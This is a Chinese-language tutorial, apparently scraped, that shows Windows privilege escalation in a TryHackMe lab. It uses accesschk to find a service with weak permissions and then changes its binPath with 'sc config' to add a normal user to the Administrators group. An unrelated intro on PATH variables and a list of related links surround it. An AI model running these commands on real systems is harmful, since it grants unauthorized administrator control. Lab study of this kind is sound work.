前沿拓展:
win10 path默認(rèn)
%systemroot%\system框,如果當(dāng)前是以administrator登錄系統(tǒng)的用戶,對話框的上面為administrator的用戶變量,對話框的下面為系統(tǒng)變量(即相當(dāng)于系統(tǒng)中所有用戶的用戶變量)。有的時候我們會看到在用戶變量和系統(tǒng)探視變量中都存在某一個環(huán)境變量,比如path,那么path的值到底是用戶變量中的值還是系統(tǒng)變量中的值,或者兩者都不是呢?**是兩者都不是。path變量的值是用戶變器量中的值與系統(tǒng)變量中的值的疊加。
4.改變環(huán)境變量和環(huán)境變量中的值應(yīng)該注意什么?
環(huán)境變量和環(huán)境變量的值不要含有空格,也不要用中文,切記!
使用 binPath 提升 Windows 權(quán)限
binPath 是一個必需的服務(wù)參數(shù),用于指定服務(wù)二進(jìn)制文件的路徑。如果任何服務(wù)配置了不正確的權(quán)限并提供對服務(wù)配置的未經(jīng)授權(quán)的訪問,攻擊者可以利用此錯誤配置并通過binPath參數(shù)執(zhí)行任意命令。
如果服務(wù)配置為以提升的權(quán)限運行,攻擊者可以在以普通用戶身份登錄時以管理權(quán)限執(zhí)行任意命令。
攻擊背后的想法是識別以系統(tǒng)或管理權(quán)限運行的服務(wù),并使用錯誤的權(quán)限來配置服務(wù)并通過binPath參數(shù)執(zhí)行任意命令。
Windows 特權(quán)升降架
在演示中,我將使用 TryHackMe 中的一個易受攻擊的機(jī)器,名為Windows PrivEsc Arena。
·黑客機(jī)器IP – 10.10.249.6
·受害者機(jī)器的IP地址是10.10.140.212
·具有權(quán)限的用戶 –用戶
初始訪問
因此,我們可以使用普通用戶user的權(quán)限進(jìn)行訪問。我們需要通過將用戶用戶添加到管理員組來提升權(quán)限。
具有用戶權(quán)限的受害計算機(jī)
我們看到只有TCM用戶是 Administrators 組的成員。
管理員組服務(wù)
第一步是為服務(wù)定義弱權(quán)限。我們可以使用Accesschk工具來查找可以修改的服務(wù)
accesschk64.exe –wvcu Everyone *
(Shows all the services that has write access to Everyone)
–u = Suppress Errors–w = Show only objects that has write access
–v = Verbose
–c = Name as a windows service ( * for all the services)
Accesschk 的智能
daclsvc服務(wù)將SERVICE_CHANGE_CONFIG權(quán)限設(shè)置為每個人。
我們可以使用以下命令查詢服務(wù)以獲取更多信息:
accesschk64.exe –wvcu daclsvc
daclsvc 服務(wù)
sc qc daclsvc
daclsvc 服務(wù)
在上面的屏幕截圖中,您可以看到daclsvc服務(wù)正在以系統(tǒng)權(quán)限運行。讓我們嘗試使用錯誤的配置將用戶用戶添加到管理員組。
開發(fā)
使用以下命令更改daclsvc服務(wù)的 binPath參數(shù):
sc config daclsvc binPath=“net localgroup administrators user /add”
更改 binPath 參數(shù)
我們看到命令執(zhí)行成功。讓我們檢查binPath參數(shù):
sc qc daclsvc
daclsvc 查詢服務(wù)
重新啟動服務(wù)后,用戶user將被添加到管理員組中。
服務(wù)開始
結(jié)論
我向您展示了如何使用 binPath 參數(shù)在 Windows 上提升權(quán)限。為了防止攻擊,您必須防止未經(jīng)授權(quán)的管理員對服務(wù)進(jìn)行更改。
拓展知識:
原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請注明出處:http://www.cddhlm.com/123903.html
相關(guān)推薦
-
gtx定制機(jī)箱
gtx定制機(jī)箱 老鐵們好啊,今天小編給大家分享下我們在使用電腦過程中會遇到的一些問題故障該如何處理,熱門電腦游戲需求配置,電腦使用的一些小技巧 神舟筆記本電腦售后服務(wù)網(wǎng)點查詢(神舟…
-
聯(lián)想售后維修服務(wù)網(wǎng)點地址(青島聯(lián)想售后維修服務(wù)網(wǎng)點地址)
聯(lián)想售后維修服務(wù)網(wǎng)點地址 我們在使用電腦的時候,難免會遇到一些問題,比如筆記本電腦觸屏沒反應(yīng)怎么回事呢? 筆記本電腦屏幕觸摸沒反應(yīng)可能有很多原因: 筆記本屏幕觸摸沒反應(yīng),可能是顯卡…
-
電腦主板走線(電腦主板上的開關(guān)線怎么接)
什么是電腦主板走線? 電腦主板走線是電腦主板上所有電氣連接線路的**。這些線路將CPU、DRAM、硬盤以及各種其他外部設(shè)備連接到主板上。主板走線的設(shè)計和布局是為了確保電路板上各個電…
-
Win10初始化網(wǎng)卡信息失敗導(dǎo)致不能上網(wǎng)的問題怎么解決?
Win10初始化網(wǎng)卡信息失敗導(dǎo)致不能上網(wǎng)的問題怎么解決?Win10初始化網(wǎng)卡信息失敗導(dǎo)致不能上網(wǎng)的問題怎么解決? Win10初始化網(wǎng)卡信息失敗導(dǎo)致不能上網(wǎng)的問題怎么解決?事實上…
-
聯(lián)想win8平板電腦(聯(lián)想平板電腦開不了機(jī)怎么辦如何處理)
聯(lián)想筆記本Bios設(shè)置教程之win8、win10改win7? 一、聯(lián)想電腦BIOS設(shè)置:(主要是把UEFI啟動模式改為傳統(tǒng)模式才能支持Win7) 1、第一打開筆記本電源,第二按下F…
-
聯(lián)想正式工的工資待遇(聯(lián)想派遣工工資待遇)
聯(lián)想正式工的工資待遇(聯(lián)想派遣工工資待遇) 這篇文章給大家聊聊關(guān)于聯(lián)想正式工的工資待遇(聯(lián)想派遣工工資待遇),以及聯(lián)想正式工的工資待遇(聯(lián)想派遣工工資待遇)對應(yīng)的知識點,希望對各位…
-
nvidiagtxpc機(jī)箱
介紹nvidia gtxpc機(jī)箱 nvidia gtxpc機(jī)箱是一款專為玩家設(shè)計的高性能機(jī)箱,它采用大尺寸設(shè)計,具有優(yōu)秀的散熱效果和良好的拓展性,是游戲發(fā)燒友必備的神器之一。該機(jī)箱…
-
電腦主板cad(電腦主板CAD圖)
什么是電腦主板CAD? CAD是計算機(jī)輔助設(shè)計的縮寫,它包含使用計算機(jī)進(jìn)行工程設(shè)計、分析和仿真的技術(shù)和工具。電腦主板CAD是其中一個應(yīng)用領(lǐng)域,即使用CAD技術(shù)設(shè)計電腦主板。 主板是…
-
12599(12599是干嘛的)
前沿拓展: 12599 12599是**移動推出的語音信箱號碼。 夠通過手機(jī)網(wǎng)絡(luò)可免費接收和發(fā)送語音留言、文字等消息,具有文語雙顯, 禮貌拒接來電等獨家功能,是一款融合了語音(IV…
-
聯(lián)想設(shè)計師臺式電腦(聯(lián)想設(shè)計師臺式電腦怎么樣)
聯(lián)想設(shè)計師臺式電腦(聯(lián)想設(shè)計師臺式電腦怎么樣) 老鐵們好啊,今天小編給大家分享下我們在使用電腦過程中會遇到的一些問題故障該如何處理,熱門電腦游戲需求配置,電腦使用的一些小技巧 聯(lián)想…